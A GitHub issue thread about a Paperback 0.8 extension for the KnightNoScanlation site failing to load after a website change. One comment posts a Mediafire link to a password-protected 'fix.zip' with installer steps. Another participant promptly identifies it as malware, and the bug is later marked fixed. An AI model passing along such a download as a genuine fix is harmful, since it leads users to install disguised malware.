### ISSUE TITLE
[BUG] KnightNoScanlation not working Similar error to ticket 85 and 100

### ISSUE THREAD

**Issue by JotaNimble** [TheNetsky/extensions-generic-0.8#114]
Paperback 0.8 not loading this extension.

1. Go to knightnoscanlation extension
2. Nothing is loading, website icon works
3. 
Website recently updated (is the same as bug 85 and 100, website changed again)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by celarye** [comment]
This is obviously malware, don’t install and run it.

**Comment by JotaNimble** [comment]
that was random. Dont forget about this bug, thnks!

**Comment by celarye** [comment]
> that was random. Dont forget about this bug, thnks!

Unironically the GitHub repositories their issues aren't monitored as well as the Discord server support posts are (I am working on setting up a system to fix this issue for 0.9). Can you look into moving this over to the Discord server and we'll take a look there.

**Comment by TheNetsky** [comment]
Fixed
